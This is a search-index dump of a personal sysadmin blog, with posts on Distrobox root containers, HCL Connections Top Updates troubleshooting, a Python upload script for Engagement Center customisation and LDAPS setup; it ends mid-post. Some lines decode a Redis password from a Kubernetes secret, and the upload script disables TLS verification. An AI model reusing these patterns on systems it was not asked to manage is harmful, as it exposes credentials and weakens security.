2024"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/conference/","title":"Conference"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/linux/","title":"Linux"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/container/","title":"Container"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/container/","title":"Container,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/distrobox/","title":"Distrobox"},{"body":"Since end of last year, I use Fedora Silverblue or, better Universal Blue on my notebooks for daily work and my personal projects.\nI will write about Univeral Blue soon, but today just a short solution in Distrobox .\nSo what\u0026rsquo;s distrobox? Use any Linux distribution inside your terminal. Enable both backward and forward compatibility with software and freedom to use whatever distribution you’re more comfortable with. Distrobox uses podman, docker or lilipod to create containers using the Linux distribution of your choice. The created container will be tightly integrated with the host, allowing sharing of the HOME directory of the user, external storage, external USB devices and graphical apps (X11/Wayland), and audio.\nOne of my terminals is based on Kali Linux and some tools in Kali need root access to the host. So it needs to use the --root flag for creating and updating the box.\nYesterday I tried to run the container as non-root, but it did not work. So I wanted to recreate the container.\n/usr/etc/distrobox/distrobox.ini\n[kali] additional_packages=\u0026#34;burpsuite zaproxy bloodhound neo4j\u0026#34; image=ghcr.io/stoeps13/kali-toolbox:latest icon=/home/stoeps/Pictures/Kali-dragon-icon.svg.png init=false nvidia=false pull=true root=true replace=true Create a distrobox: distrobox-assemble create --file /usr/etc/distrobox/distrobox.ini --name kali I got the error:\nskipping unexporting.../usr/bin/distrobox-rm: line 385: sudo podman: command not found The only hit in an internet search was this Reddit post . I added my solution there too.\nI couldn\u0026rsquo;t find a Kali box with distrobox list.\ndistrobox list ID | NAME | STATUS | IMAGE 435ae448145d | ubuntu | Created | ghcr.io/stoeps13/ubuntu-toolbox:latest fa04720cd598 | fedora | Up 4 hours | ghcr.io/stoeps13/fedora-toolbox:latest 55fb083af50a | davinci | Created | ghcr.io/zelikos/davincibox:latest Then I discovered that root containers have to be listed with:\ndistrobox list --root [sudo] password for stoeps: ID | NAME | STATUS | IMAGE 2ba524be58dd | kali | Up 4 hours | ghcr.io/stoeps13/kali-toolbox:latest Fix creation of the box I could delete the found container with\ndistrobox-stop --root kali distrobox-rm --root kali And after removing the running container the command to assemble the updated box worked without issues.\nEntering distroboxes that run with root rights:\ndistrobox enter --root kali ","excerpt":"\u003cp\u003eSince end of last year, I use \u003ca href=\"https://fedoraproject.org/atomic-desktops/silverblue/\" target=\"_blank\"\u003eFedora Silverblue \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n or, better \u003ca href=\"https://universal-blue.org/\" target=\"_blank\"\u003eUniversal Blue \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n on my notebooks for daily work and my personal projects.\u003c/p\u003e","ref":"https://stoeps.de/posts/2024/distrobox-error/","title":"Distrobox can't delete root container"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/distrobox/","title":"Distrobox,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/immutable/","title":"Immutable"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/immutable/","title":"Immutable"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/toolbox/","title":"Toolbox"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/toolbox/","title":"Toolbox,"},{"body":"You can navigate within the presentation slides with arrow keys, or the icons in the bottom right corner (forward, back).\nChemnitzer Linuxtage \u0026ndash; https://chemnitzer.linux-tage.de/ Die Dokumentation von Software und Umgebungen ist wichtig und erfordert viel Zeit und ständige Anpassungen, wenn sich etwas ändert. In dieser Session lernen Sie, wie Sie Ansible, Jinja2-Templates und Asciidoctor nutzen können, um den Dokumentationsprozess zu automatisieren und trotzdem ansprechende Ergebnisse erzielen zu können.\nMittels Asciidoctor und Pandoc ist auch die Verwendung von Vorlagen und Corporate Identity möglich, und Copy-and-paste in ein Office-Produkt kann umgangen werden.\nDokumentation als Code mit Ansible und Asciidoctor Your browser does not support this, go to the presentation directly: [media.ccc.de](https://media.ccc.de/v/clt24-214-dokumentation-als-code-mit-ansible-und-asciidoctor) FrOSCon \u0026ndash; https://froscon.org Next-Gen Desktops: Ublue-OS immutable desktop Der Vortrag präsentiert den Immutable Desktop mit Ublue-OS als wegweisende Entwicklung im Bereich des Desktop-Computings. Ublue-OS bootet direkt in einen OCI-Container, was die Erstellung eines immuntable Desktops vereinfacht und für eine robuste Sicherheit und Stabilität sorgt. Durch die Trennung von Betriebssystem und Anwendungen mittels Technologien wie Flatpak sowie die Integration von Distrobox für die nahtlose Verwaltung von Anwendungen, bietet der Immutable Desktop eine sichere, stabile und benutzerfreundliche Desktop-Umgebung. Praktische Demonstrationen verdeutlichen die einfache Erstellung und Anpassung des Desktops sowie die Durchführung von Updates und Rollbacks. Der Vortrag zeigt auf, wie Ublue-OS den Brückenschlag zwischen Desktop und Cloud-Technologien vollzieht und somit die Zukunft des Desktop-Computings maßgeblich gestaltet.\nNext-Gen Desktops: Ublue-OS immutable desktop Next-Gen Desktops: Ublue-OS immutable desktop Enterprise IT - ein agiler Realitätsabgleich In der turbulenten Welt der Unternehmens-EDV treffen absurde Regeln auf innovative Selbstschutzmechanismen der MitarbeiterInnen. Die (Miss)Kommunikation innerhalb eines großen Unternehmens hat oft System. Jobausschreibungen werden mit Hilfe von LLMs auf Basis von ein paar Wortfetzen aus dem letzten 4-Stunden-Standup formuliert und ohne Sanity-Check online gestellt. Klingt das interessant, unterhaltsam oder sogar vertraut (unser Beileid!!)? Dann ist diese Session für Dich!\n","excerpt":"\u003cp\u003eYou can navigate within the presentation slides with arrow keys, or the icons in the bottom right corner (forward, back).\u003c/p\u003e\n\u003ch2 id=\"chemnitzer-linuxtage----httpschemnitzerlinux-tagede\"\u003eChemnitzer Linuxtage \u0026ndash; \u003ca href=\"https://chemnitzer.linux-tage.de/\" target=\"_blank\"\u003ehttps://chemnitzer.linux-tage.de/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n \u003ca href=\"#chemnitzer-linuxtage----httpschemnitzerlinux-tagede\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003eDie Dokumentation von Software und Umgebungen ist wichtig und erfordert viel Zeit und ständige Anpassungen, wenn sich etwas ändert. In dieser Session lernen Sie, wie Sie Ansible, Jinja2-Templates und Asciidoctor nutzen können, um den Dokumentationsprozess zu automatisieren und trotzdem ansprechende Ergebnisse erzielen zu können.\u003c/p\u003e\n\u003cp\u003eMittels Asciidoctor und Pandoc ist auch die Verwendung von Vorlagen und Corporate Identity möglich, und Copy-and-paste in ein Office-Produkt kann umgangen werden.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/clt-2024/2024-clt-docsascode.html\" target=\"_blank\"\u003eDokumentation als Code mit Ansible und Asciidoctor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ciframe width=\"1024\" height=\"576\" src=\"https://media.ccc.de/v/clt24-214-dokumentation-als-code-mit-ansible-und-asciidoctor/oembed\" frameborder=\"0\" allowfullscreen\u003e\nYour browser does not support this, go to the presentation directly: [media.ccc.de](https://media.ccc.de/v/clt24-214-dokumentation-als-code-mit-ansible-und-asciidoctor)\n\u003c/iframe\u003e\n\u003ch2 id=\"froscon----httpsfrosconorg\"\u003eFrOSCon \u0026ndash; \u003ca href=\"https://froscon.org\" target=\"_blank\"\u003ehttps://froscon.org \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n \u003ca href=\"#froscon----httpsfrosconorg\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003ch3 id=\"next-gen-desktops-ublue-os-immutable-desktop\"\u003eNext-Gen Desktops: Ublue-OS immutable desktop \u003ca href=\"#next-gen-desktops-ublue-os-immutable-desktop\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cp\u003eDer Vortrag präsentiert den Immutable Desktop mit Ublue-OS als wegweisende Entwicklung im Bereich des Desktop-Computings. Ublue-OS bootet direkt in einen OCI-Container, was die Erstellung eines immuntable Desktops vereinfacht und für eine robuste Sicherheit und Stabilität sorgt. Durch die Trennung von Betriebssystem und Anwendungen mittels Technologien wie Flatpak sowie die Integration von Distrobox für die nahtlose Verwaltung von Anwendungen, bietet der Immutable Desktop eine sichere, stabile und benutzerfreundliche Desktop-Umgebung. Praktische Demonstrationen verdeutlichen die einfache Erstellung und Anpassung des Desktops sowie die Durchführung von Updates und Rollbacks. Der Vortrag zeigt auf, wie Ublue-OS den Brückenschlag zwischen Desktop und Cloud-Technologien vollzieht und somit die Zukunft des Desktop-Computings maßgeblich gestaltet.\u003c/p\u003e","ref":"https://stoeps.de/speaking/2024/","title":"Talks 2024"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/hcl/","title":"Hcl,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/hclcnx/","title":"Hclcnx,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/hclconnections/","title":"Hclconnections,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/orient-web-client/","title":"Orient-Web-Client"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/orient-web-client/","title":"Orient-Web-Client,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/orientme/","title":"Orientme"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/orientme/","title":"Orientme,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/top/","title":"Top"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/top-updates/","title":"Top Updates"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/top-updates/","title":"Top-Updates"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/topupdates/","title":"Topupdates"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/topupdates/","title":"Topupdates,"},{"body":"Last week, I had three systems with issues displaying the Top Updates in the Orient Me. So I tried to find out which applications and containers are involved in generating the content for this view.\nFirst, we need to know that Top Updates are part of the Component Pack, and the content of Latest Updates is the Activity stream data, which is read from the homepage database.\nScreenshot of the Connections 8 Homepage If the Top Updates tab is not visible after deploying the Component Pack, check LotusConnections-config.xml; the serviceReference for orientme needs to be enabled. There is only one serviceReference allowed for an application in this file, so check for duplicate definitions when the tab is still missing.\n\u0026lt;!--Uncomment the following serviceReference definition if OrientMe feature is enabled--\u0026gt; \u0026lt;!-- BEGIN Enabling OrientMe --\u0026gt; \u0026lt;sloc:serviceReference bootstrapHost=\u0026#34;cnx8-db2-was.stoeps.home\u0026#34; bootstrapPort=\u0026#34;admin_replace\u0026#34; clusterName=\u0026#34;\u0026#34; enabled=\u0026#34;true\u0026#34; serviceName=\u0026#34;orient\u0026#34; ssl_enabled=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;sloc:href\u0026gt; \u0026lt;sloc:hrefPathPrefix\u0026gt;/social\u0026lt;/sloc:hrefPathPrefix\u0026gt; \u0026lt;sloc:static href=\u0026#34;http://cnx8-db2-was.stoeps.home\u0026#34; ssl_href=\u0026#34;https://cnx8-db2-was.stoeps.home\u0026#34;/\u0026gt; \u0026lt;sloc:interService href=\u0026#34;https://cnx8-db2-was.stoeps.home\u0026#34;/\u0026gt; \u0026lt;/sloc:href\u0026gt; \u0026lt;/sloc:serviceReference\u0026gt; \u0026lt;!-- END Enabling OrientMe --\u0026gt; So where is the data for Top Updates stored? The data for Top Updates is read from the Opensearch/Elasticsearch index orient-me-collection. The data is processed first in WebSphere (/search/eventTracker) and sent through the SIB message store.\nThen the message store publication point connections.events exports to Redis (redis-server:30379 via the haproxy-redis service) on Kubernetes. The indexing-service reads the Redis data and writes to the Opensearch orient-me-collection index.\nI\u0026rsquo;m not 100% sure, but I expect that the retrievalservice and middleware-graphql pods are involved in reading the data for Top Updates. The GraphQL query is processed through orient-web-client.\nDependencies and troubleshooting steps Flow of Homepage Lastest Updates and Top Updates So the first step is to check if the events are written to the Opensearch index. Open a shell in the opensearch-cluster-client-0 and switch to the folder probe. Make a copy of sendRequest.sh and change the last print statement:\ncd probe cp sendRequest.sh send.sh vi send.sh Change line 27 to (add \u0026quot;\u0026quot; around the variable), this will print the output with newlines instead of one long string:\necho \u0026#34;${response_text}\u0026#34; Now let\u0026rsquo;s check the index:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 ./send.sh GET /_cat/indices [opensearch@opensearch-cluster-client-0 probe]$ ./send.sh GET /_cat/indices % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 810 100 810 0 0 6793 0 --:--:-- --:--:-- --:--:-- 6864 green open icmetricsconfig daEZC8iTRESjm8VbM7hH_g 5 1 1 0 9kb 4.5kb green open .opensearch-observability B58L49_sR7-h8eyjGXhxzA 1 2 0 0 624b 208b green open icmetrics_a_2023_2h Ngqg9EK4SF6Sk2VJOojtzw 5 1 960 0 1.3mb 697.5kb green open quickresults yewsBz9xQD24ljamtPdDaw 8 2 145 25 2.2mb 794.9kb green open icmetricscommlist BbybBZFFS9m18RS7l9bNsQ 5 1 1 0 10kb 5kb green open orient-me-collection_tmp ZsxezJzCSV2aeb8I4rxYfg 3 2 0 0 1.8kb 624b green open .opendistro_security FRHNF_XNTeSwcvpvK7-Skg 1 2 10 0 219.2kb 73kb green open orient-me-collection a2bPe_zCSkOQYhSqxcbDUQ 1 1 164 5 273.5kb 155.4kb In the last line, we see that the orient-me-collection, the 8th column with 164 needs to increase when new events appear. When you create a community, for example, this number should increase after a few seconds.\nTo check if the data is sent to Component Pack, you can check the Redis queue. You can open a shell on redis-server-0 and use redis-cli. Alternativly you can use telnet or netcat on any host to open a session on port 30379 on your Haproxy (connections-automation installs an haproxy on the Nginx host) or Kubernetes worker.\nnc \u0026lt;haproxy or k8s-worker\u0026gt; 30379 To connect, you need your redis-password:\nkubectl get secret redis-secret --template={{.data.secret}} | base64 -d Example:\n1 2 3 4 5 6 7 8 9 10 nc cnx8-db2.stoeps.home 30379 auth your-redis-password +OK subscribe connections.events *3 $9 subscribe $18 connections.events :1 Now create a community and check if messages appear in this nc session.\nThe article Verify Redis server traffic adds some more details on this topic.\nIf nothing happens in Redis, check the Gatekeeper settings at https://cnx-url/connections/config/highway.main.settings.tiles\nThe value for c2.export.redis.pass is ~@64 + the base64 encoded password.\nThere is a configure script in the Connections Automation repository - Redis Config , which does not update the Gatekeeper directly, but adds some update JSON files to the folder shared directory/configuration/update.\nTo make a long story short, in all three systems, the connection to Redis was somehow broken. I assume that during data migration, the gatekeeper settings were overwritten.\nAfter checking the hostname, port and password, I restarted the environment, and Top Updates started showing updates.\n","excerpt":"\u003cp\u003eLast week, I had three systems with issues displaying the Top Updates in the Orient Me. So I tried to find out which applications and containers are involved in generating the content for this view.\u003c/p\u003e","ref":"https://stoeps.de/posts/2023/troubleshooting-topupdates/","title":"Troubleshooting Top Updates in HCL Connections"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/updates/","title":"Updates,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/engagement-center/","title":"Engagement Center"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/engagementcenter/","title":"Engagementcenter"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/engagementcenter/","title":"Engagementcenter"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hcec/","title":"Hcec"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/hcec/","title":"Hcec,"},{"body":"With HCL Connections 6.5 and later, we got the add-on HCL Connections Engagement Center (aka CEC, HCEC, ICEC or XCC) included in a normal HCL Connections deployment.\nThe HCL Connections license contains the supplement that HCEC can be used within Communities and is the base for the Highlights application. All other options are hidden and could be enabled in LotusConnections-config.xml (set \u0026lt;genericProperty name=\u0026quot;icec.light\u0026quot;\u0026gt;false\u0026lt;/genericProperty\u0026gt;), but then you need to order the HCL Connections Engagement Center license.\nNow, the users with the admin role in ICEC (ISC - Enterprise Applications \u0026gt; ICEC \u0026gt; Security role to user/group mapping) are allowed to use the dialog or API to upload a file.\nI\u0026rsquo;m not responsible for your licenses! Do not enable the full version if you aren\u0026rsquo;t allowed to.\nAs long as icec.light is set to true, you have no option to add a customized JavaScript file with additional widgets or to hide some of the default widgets of HCEC.\nThis is documented in \u0026ldquo;Include custom.js\u0026rdquo; and \u0026ldquo;Creating a custom widget with the custom widget API\u0026rdquo; .\nThe customization files for HCEC are stored in the XCC database, so there is no option to just upload a file to the customization folder in your shared directory or use the customizer to achieve this. You can download the file from your database, it is stored in a BLOB field in XCC.XCCFILESTORAGE.\nFrom a DevOps perspective, we want to automate as much as possible, so adding this customization manually is boring and could cause errors. Since HCEC is integrated, I wish to build a script to update custom.js, without enabling the full version of HCEC.\nIn my example, I intend to hide the birthday widget and the new Leap widgets, as we haven\u0026rsquo;t deployed the Leap application in this environment. To be honest, I would expect that you could select the shown widgets somewhere, but until now, they have just been added, but there is no option to hide some of them.\nThe used custom.js in the database and the documentation contains some examples for custom widgets, but this is not necessary for the functionality or our goal to hide some widgets.\nSo I created a new file with this content:\n1 2 3 4 5 6 7 8 9 10 (function (W) { XCC.X = XCC.X || { init : function() { /* Hide widgets */ [\u0026#39;xccLeapForm\u0026#39;, \u0026#39;xccLeapResults\u0026#39;, \u0026#39;xccPeopleBirthday\u0026#39;].forEach(function removeWidgt(widgetName) { XCC.WIDGETS.TYPES[widgetName] = undefined; }); } }; }(window)); In lines 4 to 6, we set the list of widgets to undefined, so they do not appear in the list of available widgets.\nExample of widget names in browser developer tools The easiest way to find the widget name is to use the browser developer tools and use the ID of the widget.\nNow we need to upload the file to HCEC. The official upload link is only visible for users with the Admin role in ICEC and when icec.light is set to false. I traced the requests and created a script to upload the file from Python.\nThe requirement is that the used user credentials have the admin role ICEC, but it is not necessary that icec.light is set to false.\n\u0026#34;\u0026#34;\u0026#34; Author: Christoph Stoettner Mail: christoph.stoettner@stoeps.de Commandline script to upload custom.js to HCL Engagement Center This even works when icec.light = true \u0026#34;\u0026#34;\u0026#34; import sys import requests import os.path import urllib3 urllib3.disable_warnings() if len(sys.argv) != 5: raise ValueError( \u0026#34;Please provide hostname user password community-uuid and the upload filename.\\nExample: %s hostname username password custom.js\u0026#34; % sys.argv[0] ) else: cnx_host = sys.argv[1] cnx_user = sys.argv[2] cnx_pass = sys.argv[3] upload_file_name = sys.argv[4] if os.path.exists(upload_file_name): pass else: print(\u0026#34;The filename \u0026#34; + upload_file_name + \u0026#34; does not exist.\u0026#34;) sys.exit() cnx_root_url = \u0026#34;https://\u0026#34; + cnx_host headers = {} login_url = cnx_root_url + \u0026#34;/homepage/j_security_check\u0026#34; get_csrf_url = cnx_root_url + \u0026#34;/xcc/community\u0026#34; session = requests.Session() login_data = {\u0026#34;j_username\u0026#34;: cnx_user, \u0026#34;j_password\u0026#34;: cnx_pass} login_response = session.post(login_url, data=login_data, verify=False) if login_response.status_code == 200: # Create a community and delete it after getting the CSRF Token create_comm_url = cnx_root_url + \u0026#34;/communities/service/atom/communities/my\u0026#34; headers[\u0026#34;Content-Type\u0026#34;] = \u0026#34;application/atom+xml\u0026#34; comm_name = \u0026#34;Test for Highlights 1293054839840483\u0026#34; data = ( \u0026#39;\u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;UTF-8\u0026#34;?\u0026gt;\u0026lt;entry xmlns=\u0026#34;http://www.w3.org/2005/Atom\u0026#34; xmlns:app=\u0026#34;http://www.w3.org/2007/app\u0026#34; xmlns:snx=\u0026#34;http://www.ibm.com/xmlns/prod/sn\u0026#34;\u0026gt;\u0026lt;title type=\u0026#34;text\u0026#34;\u0026gt;\u0026#39; + comm_name + \u0026#39;\u0026lt;/title\u0026gt;\u0026lt;summary type=\u0026#34;text\u0026#34;\u0026gt;ignored\u0026lt;/summary\u0026gt;\u0026lt;content type=\u0026#34;html\u0026#34;\u0026gt;This should be deleted within one minute\u0026lt;/content\u0026gt;\u0026lt;published\u0026gt;ignored\u0026lt;/published\u0026gt;\u0026lt;category term=\u0026#34;community\u0026#34; scheme=\u0026#34;http://www.ibm.com/xmlns/prod/sn/type\u0026#34;\u0026gt;\u0026lt;/category\u0026gt;\u0026lt;snx:communityType\u0026gt;public\u0026lt;/snx:communityType\u0026gt;\u0026lt;/entry\u0026gt;\u0026#39; ) create_comm_response = session.post( create_comm_url, data=data, headers=headers, verify=False ) community_created = create_comm_response.headers[\u0026#34;Location\u0026#34;] community_created_uuid = community_created.split(\u0026#34;=\u0026#34;)[1] json_data = {} if create_comm_response.status_code == 201: print(\u0026#34;Community successfully created:\u0026#34; + community_created_uuid) json_data[\u0026#34;commId\u0026#34;] = community_created_uuid headers = { \u0026#34;User-Agent\u0026#34;: \u0026#34;Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/119.0\u0026#34;, \u0026#34;Accept\u0026#34;: \u0026#34;*/*\u0026#34;, \u0026#34;Accept-Language\u0026#34;: \u0026#34;en-US,en;q=0.5\u0026#34;, \u0026#34;Accept-Encoding\u0026#34;: \u0026#34;gzip, deflate\u0026#34;, \u0026#34;Content-Type\u0026#34;: \u0026#34;application/json; charset=utf-8\u0026#34;, } headers[\u0026#34;Origin\u0026#34;] = cnx_root_url headers[\u0026#34;Referer\u0026#34;] = ( cnx_root_url + \u0026#34;/communities/service/html/communityoverview?communityUuid=\u0026#34; + community_created_uuid ) get_csrf_response = session.post( get_csrf_url, headers=headers, json=json_data, verify=False ) # Store csrf_token_icec for later csrf_token = session.cookies.get_dict()[\u0026#34;csrf_token_icec\u0026#34;] upload_path = \u0026#34;/xcc/rest/files/upload\u0026#34; upload_url = cnx_root_url + upload_path headers[\u0026#34;Accept\u0026#34;] = \u0026#34;application/json, */*; charset=utf8\u0026#34; headers[\u0026#34;X-Requested-With\u0026#34;] = \u0026#34;XMLHttpRequest\u0026#34; headers[\u0026#34;X-Token-Icec\u0026#34;] = csrf_token # Remove Content-Type (is added during update) headers.pop(\u0026#34;Content-Type\u0026#34;) files = { \u0026#34;files[]\u0026#34;: (\u0026#34;custom.js\u0026#34;, open(upload_file_name), \u0026#34;application/x-javascript\u0026#34;) } upload_response = session.post( upload_url, files=files, headers=headers, verify=False ) # Handle the response as needed if upload_response.status_code == 200: print(\u0026#34;Uploaded successfully\u0026#34;) else: print(\u0026#34;Upload failed\u0026#34;) print(\u0026#34;\\n**** request headers ****\u0026#34;) # print(upload_response.request.headers) for key in upload_response.request.headers.keys(): print(key + \u0026#34;: \u0026#34; + upload_response.request.headers[key]) print(\u0026#34;\\n**** request body ****\u0026#34;) print(upload_response.request.body[:400]) print(\u0026#34;\\n**** response content ****\u0026#34;) print(upload_response.status_code, upload_response.content[:400]) # Delete community (delete twice to remove from Trash) delete_comm_response = session.delete( cnx_root_url + \u0026#34;/communities/service/atom/community/instance?communityUuid=\u0026#34; + community_created_uuid ) delete_comm_response2 = session.delete( cnx_root_url + \u0026#34;/communities/service/atom/community/instance?communityUuid=\u0026#34; + community_created_uuid ) if delete_comm_response.status_code == 200: print(\u0026#34;Temporary created community deleted: \u0026#34; + community_created_uuid) if delete_comm_response2.status_code == 200: print( \u0026#34;Temporary created community removed from trash: \u0026#34; + community_created_uuid ) else: print(\u0026#34;Temporary community couldn\u0026#39;t be deleted: \u0026#34; + community_created) else: print(\u0026#34;Community not created: \u0026#34; + str(create_comm_response.status_code)) else: print(\u0026#34;Login failed!\u0026#34;) # Close the session session.close() For the file upload we need a cookie from HCEC which is later provided as header X-Token-Icec.\nThe Python script uses requests and urllib3, so please install them before using the script:\npip3 install requests urllib3 I wrote the script to automate the task with Ansible, so I just use the sys.argv variables during the call. When you have the config.js and this script in the same directory, you can call them with:\npython3 upload_customjs.py \u0026lt;your connections hostname\u0026gt; \u0026lt;admin user\u0026gt; \u0026lt;admin password\u0026gt; \u0026lt;file to upload\u0026gt; python3 upload_customjs.py cnx8-db2.stoeps.home stoeps password custom.js There is no need to name the file custom.js, you can use any name; the script uploads as custom.js.\nExample upload. Update In the first version of this blog post you had to add a community uuid to do the csrf token call. I changed this and create a community during the upload and delete it immediatly after uploading the custom.js file.\n","excerpt":"\u003cp\u003eWith HCL Connections 6.5 and later, we got the add-on HCL Connections Engagement Center (aka CEC, HCEC, ICEC or XCC) included in a normal HCL Connections deployment.\u003c/p\u003e","ref":"https://stoeps.de/posts/2023/hide_hcec_widgets/","title":"Hide widget from Highlights"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/icec/","title":"Icec"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/icec/","title":"Icec,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/xcc/","title":"Xcc"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/xcc/","title":"Xcc,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ad/","title":"Ad"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/ad/","title":"Ad,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ldaps/","title":"Ldaps"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/ldaps/","title":"Ldaps"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/sdi/","title":"Sdi"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/sdi/","title":"Sdi,"},{"body":"I had one Connections\u0026rsquo; environment that I wanted to switch from OpenLDAP to Active Directory LDAP. The old OpenLDAP environment used LDAPS to connect, and so I assumed that the change was done quickly.\nThe first step was to make a copy of the tdisol folder I used for OpenLDAP and start changing the configuration files for the new LDAP server.\nNow we need to import the certificate used for LDAPS. You can use keytool, Keystore Explorer or openssl to get the SSL certificate from the server and store it into a JKS keystore.\nopenssl s_client -showcerts -connect ad-server-hostname:636 \u0026lt; /dev/null \u0026gt; temp-key.out openssl x509 -outform DER \u0026lt; temp-key.out \u0026gt; temp-key.der openssl x509 -inform der -in temp-key.der -out temp-key.pem /opt/IBM/TDI/V7.0/jvm/jre/bin/keytool -import -alias ldap-certificate -keystore ldapcerts.jks -file temp-key.pem This asks you for a keystore password and if you want to trust the certificate.\nExample [root@cnx8-db2-db ad_ldaps]# openssl s_client -showcerts -connect dc1.win.stoeps.home:636 \u0026lt; /dev/null \u0026gt; temp-key.out depth=0 CN = DC1.WIN.STOEPS.HOME verify error:num=20:unable to get local issuer certificate verify return:1 depth=0 CN = DC1.WIN.STOEPS.HOME verify error:num=21:unable to verify the first certificate verify return:1 depth=0 CN = DC1.WIN.STOEPS.HOME verify return:1 DONE [root@cnx8-db2-db ad_ldaps]# openssl x509 -outform DER \u0026lt; temp-key.out \u0026gt; temp-key.der [root@cnx8-db2-db ad_ldaps]# openssl x509 -inform der -in temp-key.der -out temp-key.pem [root@cnx8-db2-db ad_ldaps]# /opt/IBM/TDI/V7.20/jvm/jre/bin/keytool -import -alias ldap-certificate -keystore ldapcerts.jks -file temp-key.pem Enter keystore password: Re-enter new password: Owner: CN=DC1.WIN.STOEPS.HOME Issuer: CN=WIN-DC1-CA, DC=WIN, DC=STOEPS, DC=HOME ... Trust this certificate? [no]: yes Certificate was added to keystore Now add the new keystore to solution.properties in the tdisol directory.\nThe example solution.properties has the trustStore configuration, which just needs to be uncommented.\n... ## server authentication #javax.net.ssl.trustStore=key.jks #{protect}-javax.net.ssl.trustStorePassword= #javax.net.ssl.trustStoreType=jks # by default the server API is not used. api.on=false For my newly created keystore I added the following.\njavax.net.ssl.trustStore=ldapcerts.jks {protect}-javax.net.ssl.trustStorePassword={encr}VK/JddYbHYHDbjQ/jO91wvVJ0howxCge2Ded409WgNRoQq1JHsEMKnZa1OuWSmgnoNwUnRRTQpr9v3lbvwFSULLAUjZTClD5jkgHeHTU/dUE0OXtsSlK+gBaIOBF9IZqybZJF1hlnuWsZx29gshwY2wANrIkgzmpWYs55XwdC9A= javax.net.ssl.trustStoreType=jks We will later see that this is the issue here, but these three lines are enough to get a working TDI SSL connection to Domino LDAP or OpenLDAP.\nAdjust the server and the bind user I adjusted profiles_tdi.properties and ran collect_dns.sh to check the LDAP connection.\nChanged values in profiles_tdi.properties:\nsource_ldap_url=ldap://dc1.win.stoeps.home:636 source_ldap_search_base=dc=win,dc=stoeps,dc=home source_ldap_search_filter=(objectclass=Person) source_ldap_user_login=CN=Bind LDAP,OU=Stoeps Users,DC=WIN,DC=STOEPS,DC=HOME {protect}-source_ldap_user_password=\u0026lt;password of the bind user\u0026gt; Double check that SSL is enabled:\nsource_ldap_use_ssl=true Running collect_dns.sh failed with the message simple bind failed.\nError message in ibmdi.log 2023-11-02 12:36:34,931 INFO [AssemblyLine.AssemblyLines/_internal_ldap_iterate] - [ldap_iterate] CTGDJQ001I Using LDAP SSL connection. Ensure TCP port number is changed accordingly. 2023-11-02 12:36:35,162 ERROR [AssemblyLine.AssemblyLines/_internal_ldap_iterate] - [ldap_iterate] CTGDIS181E Error while evaluating Hook \u0026#39;On Error\u0026#39; in the Component \u0026#39;ldap_iterate\u0026#39; (ldap_iterate.initialize_fail). javax.naming.CommunicationException: simple bind failed: dc1.win.stoeps.home:636 at com.sun.jndi.ldap.LdapClient.authenticate(LdapClient.java:231) ~[?:1.8.0] My first change was to 